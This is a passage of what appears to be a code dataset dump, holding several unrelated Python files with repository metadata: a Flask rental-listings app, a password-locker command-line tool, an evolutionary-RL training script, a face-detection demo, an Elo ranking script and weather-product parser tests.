        return render_template('login.html', error=error)
@app.route('/review/<string:listing_id>', methods=['GET'])
def get_review_by_id(listing_id):
    """Render the reviews page for one listing (JWT-protected)."""
    database = get_db_instance()
    auth_status = check_auth_token(request, database)
    # Guard clause: bail out early when the token check fails.
    if auth_status != 'success':
        return '<h1>' + auth_status + '</h1>'
    reviews = reviewapi.get_review_with_listing_id(listing_id, database)
    print("reviews:", reviews)
    return render_template('reviews.html', response=reviews)
@app.route('/loginsuccess', methods=['GET'])
def get_login_success():
    """Render the static login-success page."""
    no_error = ""
    return render_template('login_success.html', error=no_error)
# Test using -> curl -X POST -H 'Content-Type: application/json' http://127.0.0.1/getlistings -d '{"bedrooms":"5.0"}'
# See https://gist.github.com/subfuzion/08c5d85437d5d4f00e58
# Run project/run_proj.sh
#http://ec2-18-191-206-216.us-east-2.compute.amazonaws.com/getlistings?zipcode=3018&bedrooms=1&accomodates=0
@app.route('/getlistings', methods=['GET'])
def get_listings():
    """Query listings filtered by zipcode, max price, accomodates and bedrooms.

    Requires a valid JWT (see check_auth_token).  Without a ``zipcode``
    query parameter the search form is rendered; otherwise a range query is
    run against MongoDB and the results rendered as a list or on a map
    (``maps`` query parameter present).
    """
    db = get_db_instance()
    auth_status = check_auth_token(request, db)
    if auth_status != 'success':
        return '<h1>' + auth_status + '</h1>'
    if request.method == 'GET':
        range_params = {}
        error = None
        query_params = {'country_code': 'AU'}
        zipcode = request.args.get('zipcode')
        print(request.args)
        if zipcode is None:
            # No search parameters yet: show the search form.
            return render_template('test1.html', error=error)
        results = {}
        query_params['zipcode'] = int(zipcode)
        # Normalise the price to a '$'-prefixed string so it compares against
        # the stored string-typed prices.
        price_max = request.args.get('price').strip()
        if not price_max.startswith('$'):
            price_max = "$" + price_max
        range_params['price'] = {'lo': '$0.00', 'hi': price_max}
        # NOTE(review): 'accomodates' spelling matches the stored schema key.
        range_params['accomodates'] = {'lo': int(request.args.get('accomodates')), 'hi': 10}
        range_params['bedrooms'] = {'lo': int(request.args.get('bedrooms')), 'hi': 6}
        print("query_params", range_params, query_params)
        # Run the range query once (the original executed it twice — once
        # only to print the result) and log the outcome.
        rv, r = query.range_query(range_params, query_params, db)
        print((rv, r))
        if not rv:
            print("404")
            abort(404)
        results["results"] = r
        print(results)
        if request.args.get('maps') is None:
            return render_template('listings.html', response=results)
        return render_template('maps.html', response=results)
if __name__ == '__main__':
    # app = Flask(__name__)
    # NOTE(review): binding to 127.0.0.1 makes the server unreachable from
    # outside a container, and debug=True must not ship to production.
    app.run(host='127.0.0.1',port=5000,debug=True)
| 3,592
| 0
| 181
|
08b321e691944be60f4baac231100dd16f8af4cc
| 5,529
|
py
|
Python
|
main.py
|
markmumba/password_locker
|
2b864dc418c2783f888fc332878e21b6ed04e370
|
[
"MIT"
] | null | null | null |
main.py
|
markmumba/password_locker
|
2b864dc418c2783f888fc332878e21b6ed04e370
|
[
"MIT"
] | null | null | null |
main.py
|
markmumba/password_locker
|
2b864dc418c2783f888fc332878e21b6ed04e370
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3.8
import pyperclip
import random
import string
from py_lock import personas, profiles
if __name__ == '__main__':
main()
| 31.061798
| 221
| 0.573702
|
#!/usr/bin/env python3.8
import pyperclip
import random
import string
from py_lock import personas, profiles
def create_persona(persona_name, password):
    """Construct and return a new personas object."""
    return personas(persona_name, password)
def save_New_persona(persona_name):
    """Append the given persona to the class-level personas list."""
    personas.personas_list.append(persona_name)
def accept_persona(persona_name, password):
    """Delegate credential confirmation to profiles.confirm_persona."""
    return profiles.confirm_persona(persona_name, password)
def create_profile(app, persona_name, user_password):
    """Build and return a new profiles entry for *app*."""
    return profiles(app, persona_name, user_password)
def save_profile(py_lock):
    """Persist the given profile via its own save_profile method."""
    py_lock.save_profile()
def delete_profile(py_lock):
    """Remove the given profile via its own delete_profile method."""
    py_lock.delete_profile()
def find_profile(app):
    """Look up and return a saved profile by application name."""
    return profiles.search_profile(app)
def check_existing_profile(app):
    """Return whether a profile is saved for *app*."""
    return profiles.profile_exist(app)
def display_profile():
    """Return all saved profiles."""
    return profiles.display_profile()
def copy_password(app):
    """Copy the password for *app* to the clipboard via profiles."""
    profiles.copy_password(app)
def gen_password():
    """Return an auto-generated password from profiles.gen_password()."""
    return profiles.gen_password()
def main():
    """Interactive password-locker menu.

    Flow: create an account (CA) or log in (LI); after a successful login a
    menu loop offers credential create/display/find/copy/generate/exit.
    """
    print("Welcome to your user profiles list.Create An Account :CA or Already have an Account LI? :")
    short_code = input("CA ,LI").lower()
    if short_code == 'ca':
        username = input("Enter your prefered username").capitalize()
        password = input("Enter Your Password As Well")
        save_New_persona(create_persona(username, password))
    elif short_code == 'li':
        username = input("Enter your prefered username").capitalize()
        password = input("Enter Your Password As Well")
        validate_persona = accept_persona(username, password)
        if validate_persona == username:
            print(f"Hello {username}.Welcome To PassWord Locker Manager")
            print('\n')
            print("what would you like to do?")
            print('\n')
            while True:
                print("Use these short codes : cc - Create a new credential, dc - Display Credential(s), fc - Find a credential,ex - Exit the application, gp- Generate A randomn password, del- Delete credential,cp-Copy Password")
                short_code = input().lower()
                if short_code == 'cc':
                    print("New Profile")
                    print("-"*10)
                    print("App name.....")
                    app_name = input().capitalize()
                    print("Your App name ...e.g instagram username")
                    persona_name = input()
                    while True:
                        print(" For Type/Paste Password type TP ; For generate_Password type gp")
                        # Bug fix: the original used ``password == input(...)``
                        # (a comparison, not an assignment), so the user's
                        # choice was discarded and the loop misbehaved.  Use a
                        # dedicated variable and re-prompt on invalid input.
                        choice = input("Enter").lower()
                        if choice == 'tp':
                            password = input("Enter Password")
                            break
                        elif choice == 'gp':
                            password = gen_password()
                            break
                        else:
                            print("Invalid password please try again")
                    save_profile(create_profile(app_name, username, password))
                    print('\n')
                    print(
                        f"New Profile : {app_name} UserName: {username} created")
                    print('\n')
                elif short_code == 'dc':
                    if display_profile():
                        print(
                            "Your Account(s) Profile(S) are as follows :")
                        print('\n')
                        for password_locker in display_profile():
                            print(
                                f"App_name :{password_locker.app_name} ; UserName: {password_locker.username} ; PassWord :{password_locker.password}")
                            print('\n')
                    else:
                        print('\n')
                        print(
                            "Oops !!! You dont seem to have any Profile saved yet")
                        print('\n')
                elif short_code == 'fc':
                    print("Enter the Account Name you want to search for")
                    search_name = input().capitalize()
                    if check_existing_profile(search_name):
                        search_profile = find_profile(search_name)
                        print(f"app_name:{search_profile.app_name}")
                        print('-'*100)
                        print(
                            f"app_name:{search_profile.app_name} password :{search_profile.password}")
                    else:
                        print("That Credential does not exist")
                        print('\n')
                elif short_code == 'cp':
                    print("Enter the app name of the profile you want to generate password for")
                    search_name = input().capitalize()
                    if check_existing_profile(search_name):
                        search_profile = find_profile(search_name)
                        print(f"{search_profile.app_name}")
                        print('-'*20)
                        password = copy_password(search_name)
                        print('\n')
                        # Bug fix: the original interpolated ``app_name``,
                        # which is only bound after a 'cc' action and
                        # otherwise raised NameError; use the profile that
                        # was just looked up.
                        print(
                            f"New profile : {search_profile.app_name} username: {username} You can proceed and paste to your account")
                        print('\n')
                    else:
                        print("That profile does not exist")
                elif short_code == 'gp':
                    password = gen_password()
                elif short_code == 'ex':
                    print("Happy Coding See You Later and try listening to podcasts mostly bill burr")
                    break
                else:
                    print("Invalid response kindly refer to the Menu above")
if __name__ == '__main__':
    # Run the interactive password-locker menu when executed as a script.
    main()
| 5,092
| 0
| 276
|
a111b0cae354e20686401a949e25af061b226bbe
| 585
|
py
|
Python
|
refresher/Set.py
|
arunma/Python_DataScience
|
2f23de4517a761f373ef3cd3e708e46e84c62719
|
[
"Apache-2.0"
] | 1
|
2018-01-21T06:43:16.000Z
|
2018-01-21T06:43:16.000Z
|
refresher/Set.py
|
arunma/Python_DataScience
|
2f23de4517a761f373ef3cd3e708e46e84c62719
|
[
"Apache-2.0"
] | null | null | null |
refresher/Set.py
|
arunma/Python_DataScience
|
2f23de4517a761f373ef3cd3e708e46e84c62719
|
[
"Apache-2.0"
] | null | null | null |
# Quick manual exercise of the Set class.
s = Set([1, 2, 3])
s.add(4)
# Fixed: ``print s`` is Python 2-only syntax (SyntaxError under Python 3);
# the parenthesised single-argument form behaves identically on both.
print(s)
print("contains 5,", s.contains(5))
print("contains 4,", s.contains(4))
s.remove(3)
print(s)
print("contains 3,", s.contains(3))
| 18.870968
| 45
| 0.574359
|
class Set:
    """A minimal set built on a dict whose keys are the members.

    Supports add / contains / remove; ``remove`` raises KeyError for a
    missing value, mirroring dict deletion.
    """
    def __init__(self, values=None):
        # Membership is encoded as dict keys; the True values are unused.
        self.dict = {}
        for value in (values if values is not None else ()):
            self.add(value)
    def __repr__(self):
        return "Set : " + str(self.dict.keys())
    def add(self, value):
        self.dict[value] = True
    def contains(self, value):
        return value in self.dict
    def remove(self, value):
        del self.dict[value]
# Quick manual exercise of the Set class defined above.
s = Set([1, 2, 3])
s.add(4)
# Fixed: ``print s`` is Python 2-only syntax (SyntaxError under Python 3);
# the parenthesised single-argument form behaves identically on both.
print(s)
print("contains 5,", s.contains(5))
print("contains 4,", s.contains(4))
s.remove(3)
print(s)
print("contains 3,", s.contains(3))
| 274
| -11
| 156
|
6cf265d72ec069ba1c8f2f1dcab4bda48de2e36a
| 4,638
|
py
|
Python
|
bevodevo/train.py
|
riveSunder/bevodevo
|
d45ec97b825489a9e94f79843e7169daa9491264
|
[
"MIT"
] | 4
|
2020-12-02T22:28:29.000Z
|
2020-12-28T05:42:06.000Z
|
bevodevo/train.py
|
riveSunder/bevodevo
|
d45ec97b825489a9e94f79843e7169daa9491264
|
[
"MIT"
] | 5
|
2020-12-27T16:43:42.000Z
|
2021-11-11T21:00:15.000Z
|
bevodevo/train.py
|
riveSunder/bevodevo
|
d45ec97b825489a9e94f79843e7169daa9491264
|
[
"MIT"
] | null | null | null |
import os
import sys
import argparse
import subprocess
import torch
import numpy as np
import time
import gym
import pybullet
import pybullet_envs
from mpi4py import MPI
comm = MPI.COMM_WORLD
from bevodevo.policies.rnns import GatedRNNPolicy
from bevodevo.policies.cnns import ImpalaCNNPolicy
from bevodevo.policies.mlps import MLPPolicy, CPPNMLPPolicy, CPPNHebbianMLP,\
HebbianMLP, ABCHebbianMLP, HebbianMetaMLP, ABCHebbianMetaMLP
from bevodevo.algos.es import ESPopulation, ConstrainedESPopulation
from bevodevo.algos.cmaes import CMAESPopulation
from bevodevo.algos.pges import PGESPopulation
from bevodevo.algos.nes import NESPopulation
from bevodevo.algos.ga import GeneticPopulation
from bevodevo.algos.random_search import RandomSearch
#from bevodevo.algos.vpg import VanillaPolicyGradient
#from bevodevo.algos.dqn import DQN
if __name__ == "__main__":
    # Parse experiment parameters and launch training.
    parser = argparse.ArgumentParser("Experiment parameters")

    parser.add_argument("-n", "--env_name", type=str, \
            help="name of environemt", default="InvertedPendulumBulletEnv-v0")
    parser.add_argument("-p", "--population_size", type=int,\
            help="number of individuals in population", default=64)
    parser.add_argument("-w", "--num_workers", type=int,\
            help="number of cpu thread workers", default=0)
    parser.add_argument("-a", "--algorithm", type=str,\
            help="name of es learning algo", default="ESPopulation")
    parser.add_argument("-pi", "--policy", type=str,\
            help="name of policy architecture", default="MLPPolicy")
    parser.add_argument("-g", "--generations", type=int,\
            help="number of generations", default=50)
    parser.add_argument("-t", "--performance_threshold", type=float,\
            help="performance threshold to use for early stopping", default=float("Inf"))
    parser.add_argument("-x", "--exp_name", type=str, \
            help="name of experiment", default="temp_exp")
    parser.add_argument("-s", "--seeds", type=int, nargs="+", default=42,\
            help="seed for initializing pseudo-random number generator")

    args = parser.parse_args()

    # Fixed typo: was ``args.enve_name`` in the last clause, which raised
    # AttributeError whenever none of the first three substrings matched
    # (``or`` short-circuiting reached the misspelled attribute).
    if "BalanceBot" in args.env_name \
            or "Duck" in args.env_name \
            or "Cube" in args.env_name \
            or "Sphere" in args.env_name:
        import open_safety.envs

    if "-v" not in args.env_name:
        args.env_name += "-v0"

    if type(args.seeds) is not list:
        args.seeds = [args.seeds]

    train(args)
| 34.102941
| 89
| 0.681975
|
import os
import sys
import argparse
import subprocess
import torch
import numpy as np
import time
import gym
import pybullet
import pybullet_envs
from mpi4py import MPI
comm = MPI.COMM_WORLD
from bevodevo.policies.rnns import GatedRNNPolicy
from bevodevo.policies.cnns import ImpalaCNNPolicy
from bevodevo.policies.mlps import MLPPolicy, CPPNMLPPolicy, CPPNHebbianMLP,\
HebbianMLP, ABCHebbianMLP, HebbianMetaMLP, ABCHebbianMetaMLP
from bevodevo.algos.es import ESPopulation, ConstrainedESPopulation
from bevodevo.algos.cmaes import CMAESPopulation
from bevodevo.algos.pges import PGESPopulation
from bevodevo.algos.nes import NESPopulation
from bevodevo.algos.ga import GeneticPopulation
from bevodevo.algos.random_search import RandomSearch
#from bevodevo.algos.vpg import VanillaPolicyGradient
#from bevodevo.algos.dqn import DQN
def train(argv):
    """Resolve the policy and population classes named in *argv* and train.

    Parameters
    ----------
    argv : argparse.Namespace
        Must provide ``policy`` (architecture name), ``algorithm``
        (population/optimizer name) and ``num_workers``; the whole namespace
        is forwarded to the chosen population's ``train`` method.

    Raises
    ------
    AssertionError
        If the policy or algorithm name matches nothing known.
    """
    # env_name, generations, population_size,
    # Substring matching: branch order matters where names overlap.
    if "gatedrnn" in argv.policy.lower():
        policy_fn = GatedRNNPolicy
        argv.policy = "GatedRNNPolicy"
    elif "impala" in argv.policy.lower():
        policy_fn = ImpalaCNNPolicy
        argv.policy = "ImpalaCNNPolicy"
    elif "cppnmlp" in argv.policy.lower():
        policy_fn = CPPNMLPPolicy
        # Fixed: was ``arg.policy`` — a NameError whenever this branch ran.
        argv.policy = "CPPNMLPPolicy"
    elif "abchebbianmlp" in argv.policy.lower():
        policy_fn = ABCHebbianMLP
        argv.policy = "ABCHebbianMLP"
    elif "abchebbianmetamlp" in argv.policy.lower():
        policy_fn = ABCHebbianMetaMLP
        argv.policy = "ABCHebbianMetaMLP"
    elif "cppnhebbianmlp" in argv.policy.lower():
        policy_fn = CPPNHebbianMLP
        argv.policy = "CPPNHebbianMLP"
    elif "hebbianmlp" in argv.policy.lower():
        policy_fn = HebbianMLP
        argv.policy = "HebbianMLP"
    elif "hebbianmetamlp" in argv.policy.lower():
        policy_fn = HebbianMetaMLP
        argv.policy = "HebbianMetaMLP"
    elif "mlppolicy" in argv.policy.lower():
        policy_fn = MLPPolicy
        argv.policy = "MLPPolicy"
    else:
        assert False, "policy not found, check spelling?"

    if "ConstrainedESPopulation" == argv.algorithm:
        population_fn = ConstrainedESPopulation
    elif "ESPopulation" == argv.algorithm:
        population_fn = ESPopulation
    elif "CMAESPopulation" == argv.algorithm:
        population_fn = CMAESPopulation
    elif "Genetic" in argv.algorithm:
        population_fn = GeneticPopulation
    elif "PGES" in argv.algorithm:
        population_fn = PGESPopulation
    elif "NES" in argv.algorithm:
        population_fn = NESPopulation
    elif "dqn" in argv.algorithm:
        # NOTE(review): the DQN / VanillaPolicyGradient imports are commented
        # out at the top of the file, so these two branches raise NameError
        # if selected — confirm before enabling them.
        population_fn = DQN
    elif "vpg" in argv.algorithm.lower():
        population_fn = VanillaPolicyGradient
    elif "andom" in argv.algorithm:
        population_fn = RandomSearch
    else:
        assert False, "population algo not found, check spelling?"

    num_workers = argv.num_workers
    population = population_fn(policy_fn, num_workers=num_workers)
    population.train(argv)
if __name__ == "__main__":
    # Parse experiment parameters and launch training.
    parser = argparse.ArgumentParser("Experiment parameters")

    parser.add_argument("-n", "--env_name", type=str, \
            help="name of environemt", default="InvertedPendulumBulletEnv-v0")
    parser.add_argument("-p", "--population_size", type=int,\
            help="number of individuals in population", default=64)
    parser.add_argument("-w", "--num_workers", type=int,\
            help="number of cpu thread workers", default=0)
    parser.add_argument("-a", "--algorithm", type=str,\
            help="name of es learning algo", default="ESPopulation")
    parser.add_argument("-pi", "--policy", type=str,\
            help="name of policy architecture", default="MLPPolicy")
    parser.add_argument("-g", "--generations", type=int,\
            help="number of generations", default=50)
    parser.add_argument("-t", "--performance_threshold", type=float,\
            help="performance threshold to use for early stopping", default=float("Inf"))
    parser.add_argument("-x", "--exp_name", type=str, \
            help="name of experiment", default="temp_exp")
    parser.add_argument("-s", "--seeds", type=int, nargs="+", default=42,\
            help="seed for initializing pseudo-random number generator")

    args = parser.parse_args()

    # Fixed typo: was ``args.enve_name`` in the last clause, which raised
    # AttributeError whenever none of the first three substrings matched
    # (``or`` short-circuiting reached the misspelled attribute).
    if "BalanceBot" in args.env_name \
            or "Duck" in args.env_name \
            or "Cube" in args.env_name \
            or "Sphere" in args.env_name:
        import open_safety.envs

    if "-v" not in args.env_name:
        args.env_name += "-v0"

    if type(args.seeds) is not list:
        args.seeds = [args.seeds]

    train(args)
| 2,117
| 0
| 23
|
305281d1d65e2e36d46180f95ea3d6692aa1c5ca
| 366
|
py
|
Python
|
prediction/models.py
|
WaruiAlfred/ail_predict
|
8d406e802394d45f4d22039e1d91c695fe8e069f
|
[
"MIT"
] | null | null | null |
prediction/models.py
|
WaruiAlfred/ail_predict
|
8d406e802394d45f4d22039e1d91c695fe8e069f
|
[
"MIT"
] | null | null | null |
prediction/models.py
|
WaruiAlfred/ail_predict
|
8d406e802394d45f4d22039e1d91c695fe8e069f
|
[
"MIT"
] | null | null | null |
# from django.db import models
from django.contrib.auth.models import AbstractUser
from django.db import models
# Create your models here.
| 40.666667
| 83
| 0.803279
|
# from django.db import models
from django.contrib.auth.models import AbstractUser
from django.db import models
# Create your models here.
class User(AbstractUser):
    """Custom user model extending Django's AbstractUser with role flags.

    The three booleans default to False and are not mutually exclusive at
    the database level.
    """
    is_admin = models.BooleanField('Admin',default=False)
    is_patient = models.BooleanField('Patient',default=False)
    is_health_practitioner = models.BooleanField('Health practitioner',default=False)
| 0
| 205
| 22
|
b0f91056a6c368409caf0a5fb324e79cfc59388f
| 2,262
|
py
|
Python
|
demos/demo_face_detection.py
|
rflamary/demos
|
af330563f5642d8435fa62641389b530a8396fc7
|
[
"MIT"
] | 25
|
2020-03-14T22:01:30.000Z
|
2021-10-05T13:50:02.000Z
|
demos/demo_face_detection.py
|
rflamary/demos
|
af330563f5642d8435fa62641389b530a8396fc7
|
[
"MIT"
] | null | null | null |
demos/demo_face_detection.py
|
rflamary/demos
|
af330563f5642d8435fa62641389b530a8396fc7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 Rémi Flamary
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import numpy as np
import cv2
import os

# Haar-cascade model shipped alongside the demos.
path_classif = os.path.dirname(__file__)+'/../data/models/haarcascade_frontalface_default.xml'

# Camera index can be overridden through the CAMERA environment variable.
cam = os.getenv("CAMERA")
if cam is None:
    cap = cv2.VideoCapture(0)
else:
    cap = cv2.VideoCapture(int(cam))

face_cascade = cv2.CascadeClassifier(path_classif)

# screenshot index
idscreen = 0

while(True):
    # Capture frame-by-frame
    ret, frame = cap.read()
    img = frame

    # apply detector on the grayscale frame
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    faces = face_cascade.detectMultiScale(gray, 1.3, 5)

    # print rectangles for detected faces
    for (x, y, w, h) in faces:
        img = cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)
        roi_gray = gray[y:y+h, x:x+w]
        roi_color = img[y:y+h, x:x+w]

    # Display the resulting frame
    cv2.imshow('Face detection', img)
    key = cv2.waitKey(1)
    if (key & 0xFF) in [ord('q')]:
        break
    if (key & 0xFF) in [ord('s')]:
        # Fixed: the captured frame is already uint8 in [0, 255]; multiplying
        # by 255 wrapped the values and produced a corrupted screenshot.
        cv2.imwrite("screen_{}.png".format(idscreen), img)
        idscreen += 1

# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
| 29
| 92
| 0.716622
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 Rémi Flamary
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import numpy as np
import cv2
import os

# Haar-cascade model shipped alongside the demos.
path_classif = os.path.dirname(__file__)+'/../data/models/haarcascade_frontalface_default.xml'

# Camera index can be overridden through the CAMERA environment variable.
cam = os.getenv("CAMERA")
if cam is None:
    cap = cv2.VideoCapture(0)
else:
    cap = cv2.VideoCapture(int(cam))

face_cascade = cv2.CascadeClassifier(path_classif)

# screenshot index
idscreen = 0

while(True):
    # Capture frame-by-frame
    ret, frame = cap.read()
    img = frame

    # apply detector on the grayscale frame
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    faces = face_cascade.detectMultiScale(gray, 1.3, 5)

    # print rectangles for detected faces
    for (x, y, w, h) in faces:
        img = cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)
        roi_gray = gray[y:y+h, x:x+w]
        roi_color = img[y:y+h, x:x+w]

    # Display the resulting frame
    cv2.imshow('Face detection', img)
    key = cv2.waitKey(1)
    if (key & 0xFF) in [ord('q')]:
        break
    if (key & 0xFF) in [ord('s')]:
        # Fixed: the captured frame is already uint8 in [0, 255]; multiplying
        # by 255 wrapped the values and produced a corrupted screenshot.
        cv2.imwrite("screen_{}.png".format(idscreen), img)
        idscreen += 1

# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
| 0
| 0
| 0
|
4a1f4f3d91982d2ea80d4f5e58037fd0d77bdd1f
| 2,571
|
py
|
Python
|
calculateRanking.py
|
ConorMaley/Catan
|
c16f1a1d1eb286b13322a8b50ef319dd079ef01c
|
[
"Apache-2.0"
] | null | null | null |
calculateRanking.py
|
ConorMaley/Catan
|
c16f1a1d1eb286b13322a8b50ef319dd079ef01c
|
[
"Apache-2.0"
] | null | null | null |
calculateRanking.py
|
ConorMaley/Catan
|
c16f1a1d1eb286b13322a8b50ef319dd079ef01c
|
[
"Apache-2.0"
] | null | null | null |
import googleSheetsApi
import eloCalculator
if __name__ == '__main__':
main()
| 30.975904
| 132
| 0.614936
|
import googleSheetsApi
import eloCalculator
def main():
    """Replay every recorded game and compute running Elo ratings.

    Reads the master score sheet from Google Sheets, seeds every player at
    1200 Elo, then walks the games in order, updating ratings pairwise with
    a fixed K-factor of 30.  Finally prints the highest/lowest ratings
    observed and the final leaderboard.
    """
    masterSheet = googleSheetsApi.getMasterSheet()
    Elos = {}
    playersArray = []
    # Track the extreme ratings observed across the whole history.
    highestELO = {}
    highestELO['score'] = 1200
    lowestELO = {}
    lowestELO['score'] = 1200
    for line_count, row in enumerate(masterSheet):
        if line_count == 0:
            # Header row: first cell is a label, the rest are player names.
            for name in row[1:]:
                Elos[name] = 1200
                playersArray.append(name)
            # print(f'Column names are {", ".join(row)}')
        else:
            Gamescore = {}
            OldElos = {}
            # Only players scoring >= 2 are treated as game participants.
            for index, score in enumerate(row[1:]):
                if score == '':
                    score = 0
                if int(score) >= 2:
                    Gamescore[playersArray[index]] = score
                    OldElos[playersArray[index]] = Elos[playersArray[index]]
            # Pairwise update: each participant is compared against every
            # other participant's *pre-game* rating (OldElos).
            for index, (player, score) in enumerate(Gamescore.items()):
                scoreChange = 0
                for jindex, (opp, oppScore) in enumerate(Gamescore.items()):
                    if index != jindex:
                        # status encodes win (1) / draw (0.5) / loss (0).
                        if int(score) > int(oppScore):
                            status = 1
                        elif int(score) == int(oppScore):
                            status = 0.5
                        else:
                            status = 0
                        # print(f'{status} = status')
                        # K is constant for now
                        tempSC = eloCalculator.CalcEloChange(Elos[player], OldElos[opp], 30, status)
                        # print(f'{player} {Elos[player]} scored {score}, Opponent {opp} {OldElos[opp]} scored {oppScore}, change to player {tempSC}')
                        scoreChange += tempSC
                # print(f'{player} scoreChange = {scoreChange}')
                Elos[player] += round(scoreChange, 2)
            # print(f'=============ELO after {line_count} games=============')
            for name in sorted(Elos, key=Elos.get, reverse=True):
                # not very efficient
                if Elos[name] > highestELO['score']:
                    highestELO['score'] = Elos[name]
                    highestELO['player'] = name
                    highestELO['game'] = line_count
                elif Elos[name] < lowestELO['score']:
                    lowestELO['score'] = Elos[name]
                    lowestELO['player'] = name
                    lowestELO['game'] = line_count
                # print(f'{name}: {Elos[name]}')
            # print(f'{sorted( ((name, score) for score, name in Elos.items()), reverse=True)}')
            # newScore = '{} : {}'.format(name, score) for score, name in Elos.items() }
            # print(f'{newScore}')
            # print(f'Game {line_count} {repr(Elos.items())}')
    #todo: write to rankings in google sheet
    # for avg, val in enumerate(Elos):
    #     avg += Elos[val]
    #     print(f'{val}: {Elos[val]}')
    # avg = avg/len(Elos)
    # print(f'Avg Elo: {avg}')
    # Final rankings
    print('=============Final ELO count=============')
    print(f'Highest ELO: {highestELO}')
    print(f'Lowest ELO: {lowestELO}')
    for name in sorted(Elos, key=Elos.get, reverse=True):
        print(f'{name}: {Elos[name]}')
if __name__ == '__main__':
    # Fetch the sheet and print the Elo rankings when run as a script.
    main()
| 2,466
| 0
| 23
|
c32342487ddf2e42cf5a098bcc493400e3bb3c02
| 1,211
|
py
|
Python
|
tests/workflows/test_cli_parser.py
|
akrherz/pyWWA
|
011526f459db00d117e59f570535ac42ca267d83
|
[
"MIT"
] | 9
|
2015-03-27T22:43:07.000Z
|
2020-04-10T04:19:47.000Z
|
tests/workflows/test_cli_parser.py
|
akrherz/pyWWA
|
011526f459db00d117e59f570535ac42ca267d83
|
[
"MIT"
] | 76
|
2015-03-05T18:20:07.000Z
|
2022-03-24T02:04:25.000Z
|
tests/workflows/test_cli_parser.py
|
akrherz/pyWWA
|
011526f459db00d117e59f570535ac42ca267d83
|
[
"MIT"
] | 3
|
2020-11-05T17:38:03.000Z
|
2022-03-04T17:39:40.000Z
|
"""Test cli_parser."""
# 3rd Party
from pyiem.util import utc
import pytest
# Local
import pywwa
from pywwa.workflows import cli_parser
from pywwa.testing import get_example_file
@pytest.mark.parametrize("database", ["iem"])
def test_processor(cursor):
    """Test basic parsing."""
    data = get_example_file("CLI.txt")
    # Pin "now" so the product-validity comparison is deterministic.
    pywwa.CTX.utcnow = utc(2015, 6, 9, 6, 51)
    prod = cli_parser.processor(cursor, data)
    assert prod.valid == pywwa.CTX.utcnow
@pytest.mark.parametrize("database", ["iem"])
def test_two_clis(cursor):
    """Test parsing ye infamous double CLI."""
    # Warm the station/summary rows so the parser's upsert has targets.
    cursor.execute(
        "select max_tmpf from summary_2014 s JOIN stations t "
        "on (s.iemid = t.iemid) WHERE t.id in ('HOU', 'IAH') "
        "and day = '2014-11-30'"
    )
    data = get_example_file("CLIHOU.txt")
    prod = cli_parser.processor(cursor, data)
    # The combined product should yield one entry per station.
    assert len(prod.data) == 2
@pytest.mark.parametrize("database", ["iem"])
def test_bad_station(cursor):
    """Test what happens when we have an unknown station."""
    # Mangle the AFOS id so the station lookup fails inside the parser.
    data = get_example_file("CLI.txt").replace("CLIFGF", "CLIXXX")
    pywwa.CTX.utcnow = utc(2015, 6, 9, 6, 51)
    prod = cli_parser.processor(cursor, data)
    assert prod is not None
| 29.536585
| 66
| 0.672998
|
"""Test cli_parser."""
# 3rd Party
from pyiem.util import utc
import pytest
# Local
import pywwa
from pywwa.workflows import cli_parser
from pywwa.testing import get_example_file
@pytest.mark.parametrize("database", ["iem"])
def test_processor(cursor):
    """Test basic parsing."""
    # Pin "now" so the product-validity comparison is deterministic.
    pywwa.CTX.utcnow = utc(2015, 6, 9, 6, 51)
    raw = get_example_file("CLI.txt")
    result = cli_parser.processor(cursor, raw)
    assert result.valid == pywwa.CTX.utcnow
@pytest.mark.parametrize("database", ["iem"])
def test_two_clis(cursor):
    """Test parsing ye infamous double CLI."""
    sql = (
        "select max_tmpf from summary_2014 s JOIN stations t "
        "on (s.iemid = t.iemid) WHERE t.id in ('HOU', 'IAH') "
        "and day = '2014-11-30'"
    )
    cursor.execute(sql)
    raw = get_example_file("CLIHOU.txt")
    result = cli_parser.processor(cursor, raw)
    # The combined product should yield one entry per station.
    assert len(result.data) == 2
@pytest.mark.parametrize("database", ["iem"])
